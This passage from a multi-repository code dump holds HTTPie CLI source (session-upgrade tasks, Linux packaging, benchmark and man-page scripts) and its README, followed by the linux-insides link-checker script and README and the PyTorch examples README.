v3_2_0_session_header_format.fix_layout, } def cli_sessions(env: Environment, args: argparse.Namespace) -> ExitStatus: action = args.cli_sessions_action if action is None: parser.error(missing_subcommand('cli', 'sessions')) if action == 'upgrade': return cli_upgrade_session(env, args) elif action == 'upgrade-all': return cli_upgrade_all_sessions(env, args) else: raise ValueError(f'Unexpected action: {action}') def upgrade_session(env: Environment, args: argparse.Namespace, hostname: str, session_name: str): session = get_httpie_session( env=env, config_dir=env.config.directory, session_name=session_name, host=hostname, url=hostname, suppress_legacy_warnings=True ) session_name = session.path.stem if session.is_new(): env.log_error(f'{session_name!r} @ {hostname!r} does not exist.') return ExitStatus.ERROR fixers = [ fixer for version, fixer in FIXERS_TO_VERSIONS.items() if is_version_greater(version, session.version) ] if 
len(fixers) == 0: env.stdout.write(f'{session_name!r} @ {hostname!r} is already up to date.\n') return ExitStatus.SUCCESS for fixer in fixers: fixer(session, hostname, args) session.save(bump_version=True) env.stdout.write(f'Upgraded {session_name!r} @ {hostname!r} to v{session.version}\n') return ExitStatus.SUCCESS def cli_upgrade_session(env: Environment, args: argparse.Namespace) -> ExitStatus: return upgrade_session( env, args=args, hostname=args.hostname, session_name=args.session ) def cli_upgrade_all_sessions(env: Environment, args: argparse.Namespace) -> ExitStatus: session_dir_path = env.config_dir / SESSIONS_DIR_NAME status = ExitStatus.SUCCESS for host_path in session_dir_path.iterdir(): hostname = host_path.name for session_path in host_path.glob("*.json"): session_name = session_path.stem status |= upgrade_session( env, args=args, hostname=hostname, session_name=session_name ) return status File: httpie/manager/tasks/export_args.py import argparse import json from httpie.cli.definition import options from httpie.cli.options import to_data from httpie.output.writer import write_raw_data from httpie.status import ExitStatus from httpie.context import Environment FORMAT_TO_CONTENT_TYPE = { 'json': 'application/json' } def cli_export_args(env: Environment, args: argparse.Namespace) -> ExitStatus: if args.format == 'json': data = json.dumps(to_data(options)) else: raise NotImplementedError(f'Unexpected format value: {args.format}') write_raw_data( env, data, stream_kwargs={'mime_overwrite': FORMAT_TO_CONTENT_TYPE[args.format]}, ) return ExitStatus.SUCCESS File: httpie/manager/tasks/__init__.py from httpie.manager.tasks.sessions import cli_sessions from httpie.manager.tasks.export_args import cli_export_args from httpie.manager.tasks.plugins import cli_plugins from httpie.manager.tasks.check_updates import cli_check_updates CLI_TASKS = { 'sessions': cli_sessions, 'export-args': cli_export_args, 'plugins': cli_plugins, 'check-updates': cli_check_updates } File: httpie/manager/tasks/check_updates.py import argparse from httpie.context import Environment from httpie.status import ExitStatus from httpie.internal.update_warnings import fetch_updates, get_update_status def cli_check_updates(env: Environment, args: argparse.Namespace) -> ExitStatus: fetch_updates(env, lazy=False) env.stdout.write(get_update_status(env)) return ExitStatus.SUCCESS File: extras/packaging/linux/build.py import stat import subprocess from pathlib import Path from typing import Iterator, Tuple BUILD_DIR = Path(__file__).parent HTTPIE_DIR = BUILD_DIR.parent.parent.parent EXTRAS_DIR = HTTPIE_DIR / 'extras' MAN_PAGES_DIR = EXTRAS_DIR / 'man' SCRIPT_DIR = BUILD_DIR / Path('scripts') HOOKS_DIR = SCRIPT_DIR / 'hooks' DIST_DIR = BUILD_DIR / 'dist' TARGET_SCRIPTS = { SCRIPT_DIR / 'http_cli.py': [], SCRIPT_DIR / 'httpie_cli.py': ['--hidden-import=pip'], } def build_binaries() -> Iterator[Tuple[str, Path]]: for target_script, extra_args in TARGET_SCRIPTS.items(): subprocess.check_call( [ 'pyinstaller', '--onefile', '--noupx', '-p', HTTPIE_DIR, '--additional-hooks-dir', HOOKS_DIR, *extra_args, target_script, ] ) for executable_path in DIST_DIR.iterdir(): if executable_path.suffix: continue stat_r = executable_path.stat() executable_path.chmod(stat_r.st_mode | stat.S_IEXEC) yield executable_path.stem, executable_path def build_packages(http_binary: Path, httpie_binary: Path) -> None: import httpie # Mapping of src_file -> dst_file files = [ (http_binary, '/usr/bin/http'), (http_binary, '/usr/bin/https'), (httpie_binary, 
'/usr/bin/httpie'), ] files.extend( (man_page, f'/usr/share/man/man1/{man_page.name}') for man_page in MAN_PAGES_DIR.glob('*.1') ) # A list of additional dependencies deps = [ 'python3 >= 3.7', 'python3-pip' ] processed_deps = [ f'--depends={dep}' for dep in deps ] processed_files = [ '='.join([str(src.resolve()), dst]) for src, dst in files ] for target in ['deb', 'rpm']: subprocess.check_call( [ 'fpm', '--force', '-s', 'dir', '-t', target, '--name', 'httpie', '--version', httpie.__version__, '--description', httpie.__doc__.strip(), '--license', httpie.__licence__, *processed_deps, *processed_files, ], cwd=DIST_DIR, ) def main(): binaries = dict(build_binaries()) build_packages(binaries['http_cli'], binaries['httpie_cli']) # Rename http_cli/httpie_cli to http/httpie binaries['http_cli'].rename(DIST_DIR / 'http') binaries['httpie_cli'].rename(DIST_DIR / 'httpie') if __name__ == '__main__': main() File: extras/packaging/linux/scripts/httpie_cli.py from httpie.manager.__main__ import main if __name__ == '__main__': import sys sys.exit(main()) File: extras/packaging/linux/scripts/http_cli.py from httpie.__main__ import main if __name__ == '__main__': import sys sys.exit(main()) File: extras/packaging/linux/scripts/hooks/hook-pip.py from pathlib import Path from PyInstaller.utils.hooks import collect_all def hook(hook_api): for pkg in [ 'pip', 'setuptools', 'distutils', 'pkg_resources' ]: datas, binaries, hiddenimports = collect_all(pkg) hook_api.add_datas(datas) hook_api.add_binaries(binaries) hook_api.add_imports(*hiddenimports) File: extras/profiling/run.py """ Run the HTTPie benchmark suite with multiple environments. This script is configured in a way that, it will create two (or more) isolated environments and compare the *last commit* of this repository with it's master. > If you didn't commit yet, it won't be showing results. You can also pass --fresh, which would test the *last commit* of this repository with a fresh copy of HTTPie itself. This way even if you don't have an up-to-date master branch, you can still compare it with the upstream's master. You can also pass --complex to add 2 additional environments, which would include additional dependencies like pyOpenSSL. 
Examples: # Run everything as usual, and compare last commit with master $ python extras/profiling/run.py # Include complex environments $ python extras/profiling/run.py --complex # Compare against a fresh copy $ python extras/profiling/run.py --fresh # Compare against a custom branch of a custom repo $ python extras/profiling/run.py --target-repo my_repo --target-branch my_branch # Debug changes made on this script (only run benchmarks once) $ python extras/profiling/run.py --debug """ import dataclasses import shlex import subprocess import sys import tempfile import venv from argparse import ArgumentParser, FileType from contextlib import contextmanager from dataclasses import dataclass from pathlib import Path from typing import (IO, Dict, Generator, Iterable, List, Optional, Tuple) BENCHMARK_SCRIPT = Path(__file__).parent / 'benchmarks.py' CURRENT_REPO = Path(__file__).parent.parent.parent GITHUB_URL = 'https://github.com/httpie/cli.git' TARGET_BRANCH = 'master' # Additional dependencies for --complex ADDITIONAL_DEPS = ('pyOpenSSL',) def call(*args, **kwargs): kwargs.setdefault('stdout', subprocess.DEVNULL) return subprocess.check_call(*args, **kwargs) class Environment: """ Each environment defines how to create an isolated instance where we could install HTTPie and run benchmarks without any environmental factors. """ @contextmanager def on_repo(self) -> Generator[Tuple[Path, Dict[str, str]], None, None]: """ Return the path to the python interpreter and the environment variables (e.g HTTPIE_COMMAND) to be used on the benchmarks. """ raise NotImplementedError @dataclass class HTTPieEnvironment(Environment): repo_url: str branch: Optional[str] = None dependencies: Iterable[str] = () @contextmanager def on_repo(self) -> Generator[Path, None, None]: with tempfile.TemporaryDirectory() as directory_path: directory = Path(directory_path) # Clone the repo repo_path = directory / 'httpie' call( ['git', 'clone', self.repo_url, repo_path], stderr=subprocess.DEVNULL, ) if self.branch is not None: call( ['git', 'checkout', self.branch], cwd=repo_path, stderr=subprocess.DEVNULL, ) # Prepare the environment venv_path = directory / '.venv' venv.create(venv_path, with_pip=True) # Install basic dependencies python = venv_path / 'bin' / 'python' call( [ python, '-m', 'pip', 'install', 'wheel', 'pyperf==2.3.0', *self.dependencies, ] ) # Create a wheel distribution of HTTPie call([python, 'setup.py', 'bdist_wheel'], cwd=repo_path) # Install httpie distribution_path = next((repo_path / 'dist').iterdir()) call( [python, '-m', 'pip', 'install', distribution_path], cwd=repo_path, ) http = venv_path / 'bin' / 'http' yield python, {'HTTPIE_COMMAND': shlex.join([str(python), str(http)])} @dataclass class LocalCommandEnvironment(Environment): local_command: str @contextmanager def on_repo(self) -> Generator[Path, None, None]: yield sys.executable, {'HTTPIE_COMMAND': self.local_command} def dump_results( results: List[str], file: IO[str], min_speed: Optional[str] = None ) -> None: for result in results: lines = result.strip().splitlines() if min_speed is not None and "hidden" in lines[-1]: lines[-1] = ( 'Some benchmarks were hidden from this list ' 'because their timings did not change in a ' 'significant way (change was within the error ' 'margin ±{margin}%).' 
).format(margin=min_speed) result = '\n'.join(lines) print(result, file=file) print("\n---\n", file=file) def compare(*args, directory: Path, min_speed: Optional[str] = None): compare_args = ['pyperf', 'compare_to', '--table', '--table-format=md', *args] if min_speed: compare_args.extend(['--min-speed', min_speed]) return subprocess.check_output( compare_args, cwd=directory, text=True, ) def run( configs: List[Dict[str, Environment]], file: IO[str], debug: bool = False, min_speed: Optional[str] = None, ) -> None: result_directory = Path(tempfile.mkdtemp()) results = [] current = 1 total = sum(1 for config in configs for _ in config.items()) def iterate(env_name, status): print( f'Iteration: {env_name} ({current}/{total}) ({status})' + ' ' * 10, end='\r', flush=True, ) for config in configs: for env_name, env in config.items(): iterate(env_name, 'setting up') with env.on_repo() as (python, env_vars): iterate(env_name, 'running benchmarks') args = [python, BENCHMARK_SCRIPT, '-o', env_name] if debug: args.append('--debug-single-value') call( args, cwd=result_directory, env=env_vars, ) current += 1 results.append(compare( *config.keys(), directory=result_directory, min_speed=min_speed )) dump_results(results, file=file, min_speed=min_speed) print('Results are available at:', result_directory) def main() -> None: parser = ArgumentParser() parser.add_argument('--local-repo', default=CURRENT_REPO) parser.add_argument('--local-branch', default=None) parser.add_argument('--target-repo', default=CURRENT_REPO) parser.add_argument('--target-branch', default=TARGET_BRANCH) parser.add_argument( '--fresh', action='store_const', const=GITHUB_URL, dest='target_repo', help='Clone the target repo from upstream GitHub URL', ) parser.add_argument( '--complex', action='store_true', help='Add a second run, with a complex python environment.', ) parser.add_argument( '--local-bin', help='Run the suite with the given local binary in addition to' ' existing runners. (E.g --local-bin $(command -v xh))', ) parser.add_argument( '--file', type=FileType('w'), default=sys.stdout, help='File to print the actual results', ) parser.add_argument( '--min-speed', help='Minimum of speed in percent to consider that a ' 'benchmark is significant' ) parser.add_argument( '--debug', action='store_true', ) options = parser.parse_args() configs = [] base_config = { options.target_branch: HTTPieEnvironment(options.target_repo, options.target_branch), 'this_branch': HTTPieEnvironment(options.local_repo, options.local_branch), } configs.append(base_config) if options.complex: complex_config = { env_name + '-complex': dataclasses.replace(env, dependencies=ADDITIONAL_DEPS) for env_name, env in base_config.items() } configs.append(complex_config) if options.local_bin: base_config['binary'] = LocalCommandEnvironment(options.local_bin) run(configs, file=options.file, debug=options.debug, min_speed=options.min_speed) if __name__ == '__main__': main() File: extras/profiling/benchmarks.py """ This file is the declaration of benchmarks for HTTPie. It is also used to run them with the current environment. Each instance of BaseRunner class will be an individual benchmark. And if run without any arguments, this file will execute every benchmark instance and report the timings. The benchmarks are run through 'pyperf', which allows to do get very precise results. For micro-benchmarks like startup, please run `pyperf system tune` to get even more accurate results. 
Examples: # Run everything as usual, the default is that we do 3 warm-up runs # and 5 actual runs. $ python extras/profiling/benchmarks.py # For retrieving results faster, pass --fast $ python extras/profiling/benchmarks.py --fast # For verify everything works as expected, pass --debug-single-value. # It will only run everything once, so the resuls are not reliable. But # very useful when iterating on a benchmark $ python extras/profiling/benchmarks.py --debug-single-value # If you want to run with a custom HTTPie command (for example with # and HTTPie instance installed in another virtual environment), # pass HTTPIE_COMMAND variable. $ HTTPIE_COMMAND="/my/python /my/httpie" python extras/profiling/benchmarks.py """ from __future__ import annotations import os import shlex import subprocess import sys import threading from contextlib import ExitStack, contextmanager from dataclasses import dataclass, field from functools import cached_property, partial from http.server import HTTPServer, SimpleHTTPRequestHandler from tempfile import TemporaryDirectory from typing import ClassVar, Final, List import pyperf # For download benchmarks, define a set of files. # file: (block_size, count) => total_size = block_size * count PREDEFINED_FILES: Final = {'3G': (3 * 1024 ** 2, 1024)} class QuietSimpleHTTPServer(SimpleHTTPRequestHandler): def log_message(self, *args, **kwargs): pass @contextmanager def start_server(): """Create a server to serve local files. It will create the PREDEFINED_FILES through dd.""" with TemporaryDirectory() as directory: for file_name, (block_size, count) in PREDEFINED_FILES.items(): subprocess.check_call( [ 'dd', 'if=/dev/zero', f'of={file_name}', f'bs={block_size}', f'count={count}', ], cwd=directory, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, ) handler = partial(QuietSimpleHTTPServer, directory=directory) server = HTTPServer(('localhost', 0), handler) thread = threading.Thread(target=server.serve_forever) thread.start() yield '{}:{}'.format(*server.socket.getsockname()) server.shutdown() thread.join(timeout=0.5) @dataclass class Context: benchmarks: ClassVar[List[BaseRunner]] = [] stack: ExitStack = field(default_factory=ExitStack) runner: pyperf.Runner = field(default_factory=pyperf.Runner) def run(self) -> pyperf.BenchmarkSuite: results = [benchmark.run(self) for benchmark in self.benchmarks] return pyperf.BenchmarkSuite(results) @property def cmd(self) -> List[str]: if cmd := os.getenv('HTTPIE_COMMAND'): return shlex.split(cmd) http = os.path.join(os.path.dirname(sys.executable), 'http') assert os.path.exists(http) return [sys.executable, http] @cached_property def server(self) -> str: return self.stack.enter_context(start_server()) def __enter__(self): return self def __exit__(self, *exc_info): self.stack.close() @dataclass class BaseRunner: """ An individual benchmark case. By default it has the category (e.g like startup or download) and a name. """ category: str title: str def __post_init__(self): Context.benchmarks.append(self) def run(self, context: Context) -> pyperf.Benchmark: raise NotImplementedError @property def name(self) -> str: return f'{self.title} ({self.category})' @dataclass class CommandRunner(BaseRunner): """ Run a single command, and benchmark it. """ args: List[str] def run(self, context: Context) -> pyperf.Benchmark: return context.runner.bench_command(self.name, [*context.cmd, *self.args]) @dataclass class DownloadRunner(BaseRunner): """ Benchmark downloading a single file from the remote server. 
""" file_name: str def run(self, context: Context) -> pyperf.Benchmark: return context.runner.bench_command( self.name, [ *context.cmd, '--download', 'GET', f'{context.server}/{self.file_name}', ], ) CommandRunner('startup', '`http --version`', ['--version']) CommandRunner('startup', '`http --offline pie.dev/get`', ['--offline', 'pie.dev/get']) for pretty in ['all', 'none']: CommandRunner( 'startup', f'`http --pretty={pretty} pie.dev/stream/1000`', [ '--print=HBhb', f'--pretty={pretty}', 'httpbin.org/stream/1000' ] ) DownloadRunner('download', '`http --download :/big_file.txt` (3GB)', '3G') def main() -> None: # PyPerf will bring it's own argument parser, so configure the script. # The somewhat fast and also precise enough configuration is this. We run # benchmarks 3 times to warm up (e.g especially for download benchmark, this # is important). And then 5 actual runs where we record. sys.argv.extend( ['--worker', '--loops=1', '--warmup=3', '--values=5', '--processes=2'] ) with Context() as context: context.run() if __name__ == '__main__': main() File: extras/scripts/generate_man_pages.py import os import re from contextlib import contextmanager from pathlib import Path from typing import Optional, Iterator, Iterable # So that httpie.cli.definition can provide man-page-specific output. Must be set before importing httpie. os.environ['HTTPIE_BUILDING_MAN_PAGES'] = '1' import httpie from httpie.cli.definition import options as core_options, IS_MAN_PAGE from httpie.cli.options import ParserSpec from httpie.manager.cli import options as manager_options from httpie.output.ui.rich_help import OptionsHighlighter, to_usage from httpie.output.ui.rich_utils import render_as_string assert IS_MAN_PAGE, 'CLI definition does not understand we’re building man pages' # Escape certain characters, so they are rendered properly on all terminals. # <https://man7.org/linux/man-pages/man7/groff_char.7.html> ESCAPE_MAP = { '"': '\[dq]', "'": '\[aq]', '~': '\(ti', '’': "\(ga", '\\': '\e', } ESCAPE_MAP = {ord(key): value for key, value in ESCAPE_MAP.items()} EXTRAS_DIR = Path(__file__).parent.parent MAN_PAGE_PATH = EXTRAS_DIR / 'man' PROJECT_ROOT = EXTRAS_DIR.parent OPTION_HIGHLIGHT_RE = re.compile( OptionsHighlighter.highlights[0] ) class ManPageBuilder: def __init__(self): self.source = [] def title_line( self, full_name: str, program_name: str, program_version: str, last_edit_date: str, ) -> None: self.source.append( f'.TH {program_name} 1 "{last_edit_date}" ' f'"{full_name} {program_version}" "{full_name} Manual"' ) def set_name(self, program_name: str) -> None: with self.section('NAME'): self.write(program_name) def write(self, text: str, *, bold: bool = False) -> None: if bold: text = '.B ' + text self.source.append(text) def separate(self) -> None: self.source.append('.PP') def format_desc(self, desc: str) -> str: description = _escape_and_dedent(desc) description = OPTION_HIGHLIGHT_RE.sub( # Boldify the option part, but don't remove the prefix (start of the match). 
lambda match: match[1] + self.boldify(match['option']), description ) return description def add_comment(self, comment: str) -> None: self.source.append(f'.\\" {comment}') def add_options(self, options: Iterable[str], *, metavar: Optional[str] = None) -> None: text = ", ".join(map(self.boldify, options)) if metavar: text += f' {self.underline(metavar)}' self.write(f'.IP "{text}"') def build(self) -> str: return '\n'.join(self.source) @contextmanager def section(self, section_name: str) -> Iterator[None]: self.write(f'.SH {section_name}') self.in_section = True yield self.in_section = False def underline(self, text: str) -> str: return r'\fI\,{}\/\fR'.format(text) def boldify(self, text: str) -> str: return r'\fB\,{}\/\fR'.format(text) def _escape_and_dedent(text: str) -> str: lines = [] for should_act, line in enumerate(text.splitlines()): # Only dedent after the first line. if should_act: if line.startswith(' '): line = line[4:] lines.append(line) return '\n'.join(lines).translate(ESCAPE_MAP) def to_man_page(program_name: str, spec: ParserSpec, *, is_top_level_cmd: bool = False) -> str: builder = ManPageBuilder() builder.add_comment( f"This file is auto-generated from the parser declaration " + (f"in {Path(spec.source_file).relative_to(PROJECT_ROOT)} " if spec.source_file else "") + f"by {Path(__file__).relative_to(PROJECT_ROOT)}." ) builder.title_line( full_name='HTTPie', program_name=program_name, program_version=httpie.__version__, last_edit_date=httpie.__date__, ) builder.set_name(program_name) with builder.section('SYNOPSIS'): # `http` and `https` are commands that can be directly used, so they can have # a valid usage. But `httpie` is a top-level command with multiple sub commands, # so for the synopsis we'll only reference the `httpie` name. if is_top_level_cmd: synopsis = program_name else: synopsis = render_as_string(to_usage(spec, program_name=program_name)) builder.write(synopsis) with builder.section('DESCRIPTION'): builder.write(spec.description) if spec.man_page_hint: builder.write(spec.man_page_hint) for index, group in enumerate(spec.groups, 1): with builder.section(group.name): if group.description: builder.write(group.description) for argument in group.arguments: if argument.is_hidden: continue raw_arg = argument.serialize(isolation_mode=True) metavar = raw_arg.get('metavar') if raw_arg.get('is_positional'): # In case of positional arguments, metavar is always equal # to the list of options (e.g `METHOD`). metavar = None builder.add_options(raw_arg['options'], metavar=metavar) desc = builder.format_desc(raw_arg.get('description', '')) builder.write('\n' + desc + '\n') builder.separate() if spec.epilog: with builder.section('SEE ALSO'): builder.write(builder.format_desc(spec.epilog)) return builder.build() def main() -> None: for program_name, spec, config in [ ('http', core_options, {}), ('https', core_options, {}), ('httpie', manager_options, {'is_top_level_cmd': True}), ]: with open((MAN_PAGE_PATH / program_name).with_suffix('.1'), 'w') as stream: stream.write(to_man_page(program_name, spec, **config)) if __name__ == '__main__': main()
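

# A minimal, self-contained sketch of the escaping pattern used above: ESCAPE_MAP
# is keyed by ord(char) so a single str.translate() call can rewrite every special
# character in one pass. The helper name below is illustrative and not part of the script.
def _escape_map_demo() -> str:
    escapes = {'"': r'\[dq]', "'": r'\[aq]'}
    table = {ord(key): value for key, value in escapes.items()}
    # 'say "hi"' -> 'say \[dq]hi\[dq]'
    return 'say "hi"'.translate(table)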
<h2 align="center"> <a href="https://httpie.io" target="blank_"> <img height="100" alt="HTTPie" src="https://raw.githubusercontent.com/httpie/cli/master/docs/httpie-logo.svg" /> </a> <br> HTTPie CLI: human-friendly HTTP client for the API era </h2> <div align="center"> [![HTTPie for Desktop](https://img.shields.io/static/v1?label=HTTPie&message=Desktop&color=4B78E6)](https://httpie.io/product) [![](https://img.shields.io/static/v1?label=HTTPie&message=Web%20%26%20Mobile&color=73DC8C)](https://httpie.io/app) [![](https://img.shields.io/static/v1?label=HTTPie&message=CLI&color=FA9BFA)](https://httpie.io/cli) [![Twitter](https://img.shields.io/twitter/follow/httpie?style=flat&color=%234B78E6&logoColor=%234B78E6)](https://twitter.com/httpie) [![Chat](https://img.shields.io/discord/725351238698270761?style=flat&label=Chat%20on%20Discord&color=%23FA9BFA)](https://httpie.io/discord) </div> <div align="center"> [![Docs](https://img.shields.io/badge/stable%20docs-httpie.io%2Fdocs%2Fcli-brightgreen?style=flat&color=%2373DC8C&label=Docs)](https://httpie.org/docs/cli) [![Latest version](https://img.shields.io/pypi/v/httpie.svg?style=flat&label=Latest&color=%234B78E6&logo=&logoColor=white)](https://pypi.python.org/pypi/httpie) [![Build](https://img.shields.io/github/actions/workflow/status/httpie/cli/tests.yml?branch=master&color=%23FA9BFA&label=Build)](https://github.com/httpie/cli/actions) [![Coverage](https://img.shields.io/codecov/c/github/httpie/cli?style=flat&label=Coverage&color=%2373DC8C)](https://codecov.io/gh/httpie/cli) [![PyPi downloads](https://img.shields.io/pepy/dt/httpie?style=flat&label=Downloads%20from%20PyPi%20only&color=4B78E6)](https://www.pepy.tech/projects/httpie) </div> HTTPie (pronounced _aitch-tee-tee-pie_) is a command-line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. HTTPie is designed for testing, debugging, and generally interacting with APIs & HTTP servers. The `http` & `https` commands allow for creating and sending arbitrary HTTP requests. They use simple and natural syntax and provide formatted and colorized output. <div align="center"> <img src="https://raw.githubusercontent.com/httpie/cli/master/docs/httpie-animation.gif" alt="HTTPie in action" width="100%"/> </div> ## We lost 54k GitHub stars Please note we recently accidentally made this repo private for a moment, and GitHub deleted our community that took a decade to build. 
Read the full story here: https://httpie.io/blog/stardust

![](docs/stardust.png)

## Getting started

- [Installation instructions →](https://httpie.io/docs#installation)
- [Full documentation →](https://httpie.io/docs)

## Features

- Expressive and intuitive syntax
- Formatted and colorized terminal output
- Built-in JSON support
- Forms and file uploads
- HTTPS, proxies, and authentication
- Arbitrary request data
- Custom headers
- Persistent sessions
- `wget`-like downloads

[See all features →](https://httpie.io/docs)

## Examples

Hello World:

```bash
https httpie.io/hello
```

Custom [HTTP method](https://httpie.io/docs#http-method), [HTTP headers](https://httpie.io/docs#http-headers), and [JSON](https://httpie.io/docs#json) data:

```bash
http PUT pie.dev/put X-API-Token:123 name=John
```

Build and print a request without sending it using [offline mode](https://httpie.io/docs/cli/offline-mode):

```bash
http --offline pie.dev/post hello=offline
```

Use the [GitHub API](https://developer.github.com/v3/issues/comments/#create-a-comment) to post a comment on an [Issue](https://github.com/httpie/cli/issues/83) with [authentication](https://httpie.io/docs#authentication):

```bash
http -a USERNAME POST https://api.github.com/repos/httpie/cli/issues/83/comments body='HTTPie is awesome! :heart:'
```

[See more examples →](https://httpie.io/docs#examples)

## Community & support

- Visit the [HTTPie website](https://httpie.io) for full documentation and useful links.
- Join our [Discord server](https://httpie.io/discord) to ask questions, discuss features, and chat about APIs in general.
- Tweet at [@httpie](https://twitter.com/httpie) on Twitter.
- Use [StackOverflow](https://stackoverflow.com/questions/tagged/httpie) to ask questions and include the `httpie` tag.
- Create [GitHub Issues](https://github.com/httpie/cli/issues) for bug reports and feature requests.
- Subscribe to the [HTTPie newsletter](https://httpie.io) for occasional updates.

## Contributing

Have a look through existing [Issues](https://github.com/httpie/cli/issues) and [Pull Requests](https://github.com/httpie/cli/pulls) that you could help with. If you'd like to request a feature or report a bug, please [create a GitHub Issue](https://github.com/httpie/cli/issues) using one of the templates provided.

[See contribution guide →](https://github.com/httpie/cli/blob/master/CONTRIBUTING.md)
linux-insides
0995b4bc531fcf29b4431ecf0e29aa86e66838f4
File: Scripts/get_all_links.py #!/usr/bin/env python from __future__ import print_function from socket import timeout import os import sys import codecs import re import markdown try: # compatible for python2 from urllib2 import urlopen from urllib2 import HTTPError from urllib2 import URLError except ImportError: # compatible for python3 from urllib.request import urlopen from urllib.error import HTTPError from urllib.error import URLError def check_live_url(url): result = False try: ret = urlopen(url, timeout=2) result = (ret.code == 200) except HTTPError as e: print(e, file=sys.stderr) except URLError as e: print(e, file=sys.stderr) except timeout as e: print(e, file=sys.stderr) except Exception as e: print(e, file=sys.stderr) return result def main(path): filenames = [] for (dirpath, dnames, fnames) in os.walk(path): for fname in fnames: if fname.endswith('.md'): filenames.append(os.sep.join([dirpath, fname])) urls = [] for filename in filenames: fd = codecs.open(filename, mode="r", encoding="utf-8") for line in fd.readlines(): refs = re.findall(r'(?<=<a href=")[^"]*', markdown.markdown(line)) for ref in refs: if ref not in urls: urls.append(ref) fd.close() for url in urls: if not url.startswith("http"): print("markdown file name: " + url) continue if check_live_url(url): print(url) else: print(url, file=sys.stderr) if __name__ == '__main__': if len(sys.argv) == 2: main(sys.argv[1]) else: print("Choose one path as argument one")
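

# Example invocation (illustrative; requires the `markdown` package imported above):
#
#   $ python Scripts/get_all_links.py .
#
# Live URLs are printed to stdout, while dead or unreachable ones go to stderr,
# so failures can be collected separately:
#
#   $ python Scripts/get_all_links.py . 2> broken_links.txt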
linux-insides
===============

A book-in-progress about the linux kernel and its insides.

**The goal is simple** - to share my modest knowledge about the insides of the linux kernel and help people who are interested in linux kernel insides and other low-level subject matter.

Feel free to go through the book. [Start here](https://github.com/0xAX/linux-insides/blob/master/SUMMARY.md)

**Questions/Suggestions**: Feel free to ask questions or share suggestions by pinging me on twitter [@0xAX](https://twitter.com/0xAX), opening an [issue](https://github.com/0xAX/linux-insides/issues/new), or just dropping me an [email](mailto:[email protected]).

Generating eBooks and PDFs - [documentation](https://github.com/GitbookIO/gitbook/blob/master/docs/ebook.md)

# Mailing List

We have a Google Group mailing list for learning the kernel source code. Here are some instructions about how to use it.

#### Join

Send an email with any subject/content to `[email protected]`. You will then receive a confirmation email. Reply to it with any content and you are done.

> If you have a Google account, you can also open the [archive page](https://groups.google.com/forum/#!forum/kernelhacking) and click **Apply to join group**. You will be approved automatically.

#### Send emails to mailing list

Just send emails to `[email protected]`. The basic usage is the same as other mailing lists powered by mailman.

#### Archives

https://groups.google.com/forum/#!forum/kernelhacking

In other languages
-------------------

* [Brazilian Portuguese](https://github.com/mauri870/linux-insides)
* [Chinese](https://github.com/MintCN/linux-insides-zh)
* [Japanese](https://github.com/tkmru/linux-insides-ja)
* [Korean](https://github.com/junsooo/linux-insides-ko)
* [Russian](https://github.com/proninyaroslav/linux-insides-ru)
* [Spanish](https://github.com/leolas95/linux-insides)
* [Turkish](https://github.com/ayyucedemirbas/linux-insides_Turkish)

Docker
------

To run your own copy of the book with gitbook inside a local container:

1. Enable Docker experimental features with vim or another text editor

    ```bash
    sudo vim /usr/lib/systemd/system/docker.service
    ```

    Then add `--experimental=true` to the end of the `ExecStart=/usr/bin/dockerd -H fd://` line and save, e.g.: *ExecStart=/usr/bin/dockerd -H fd:// --experimental=true*

    Then reload and restart the Docker daemon:

    ```bash
    systemctl daemon-reload
    systemctl restart docker.service
    ```

2. Run the docker image

    ```bash
    make run
    ```

3. Open your local copy of the linux-insides book at http://localhost:4000, or run `make browse`

Contributions
--------------

Feel free to create issues or pull requests if you have any problems.

**Please read [CONTRIBUTING.md](https://github.com/0xAX/linux-insides/blob/master/CONTRIBUTING.md) before pushing any changes.**

![linux-kernel](Assets/linux-kernel.png)

Author
---------------

[@0xAX](https://twitter.com/0xAX)

LICENSE
-------------

Licensed [BY-NC-SA Creative Commons](http://creativecommons.org/licenses/by-nc-sa/4.0/).
examples
26de41904319c7094afc53a3ee809de47112d387
# PyTorch Examples

![Run Examples](https://github.com/pytorch/examples/workflows/Run%20Examples/badge.svg)

https://pytorch.org/examples/

`pytorch/examples` is a repository showcasing examples of using [PyTorch](https://github.com/pytorch/pytorch). The goal is to provide curated, short, _high quality_ examples with few or no dependencies that are substantially different from each other and that can be emulated in your existing work.

- For tutorials: https://github.com/pytorch/tutorials
- For changes to pytorch.org: https://github.com/pytorch/pytorch.github.io
- For a general model hub: https://pytorch.org/hub/ or https://huggingface.co/models
- For recipes on how to run PyTorch in production: https://github.com/facebookresearch/recipes
- For general Q&A and support: https://discuss.pytorch.org/

## Available models

- [Image classification (MNIST) using Convnets](./mnist/README.md)
- [Word-level Language Modeling using RNN and Transformer](./word_language_model/README.md)
- [Training ImageNet Classifiers with Popular Networks](./imagenet/README.md)
- [Generative Adversarial Networks (DCGAN)](./dcgan/README.md)
- [Variational Auto-Encoders](./vae/README.md)
- [Super-resolution using an efficient sub-pixel convolutional neural network](./super_resolution/README.md)
- [Hogwild training of shared ConvNets across multiple processes on MNIST](mnist_hogwild)
- [Training a CartPole to balance in OpenAI Gym with actor-critic](./reinforcement_learning/README.md)
- [Natural Language Inference (SNLI) with GloVe vectors, LSTMs, and torchtext](snli)
- [Time sequence prediction - use an LSTM to learn sine waves](./time_sequence_prediction/README.md)
- [Implement the Neural Style Transfer algorithm on images](./fast_neural_style/README.md)
- [Reinforcement Learning with Actor Critic and REINFORCE algorithms on OpenAI gym](./reinforcement_learning/README.md)
- [PyTorch Module Transformations using fx](./fx/README.md)
- Distributed PyTorch examples with [Distributed Data Parallel](./distributed/ddp/README.md) and [RPC](./distributed/rpc)
- [Several examples illustrating the C++ Frontend](cpp)
- [Image Classification Using Forward-Forward](./mnist_forward_forward/README.md)
- [Language Translation using Transformers](./language_translation/README.md)

Additionally, a list of good examples hosted in their own repositories:

- [Neural Machine Translation using sequence-to-sequence RNN with attention (OpenNMT)](https://github.com/OpenNMT/OpenNMT-py)

## Contributing

If you'd like to contribute your own example or fix a bug, please make sure to take a look at [CONTRIBUTING.md](CONTRIBUTING.md).
localGPT
a1dea3becb8b1ae28a87369b1636c4c4a4501c27
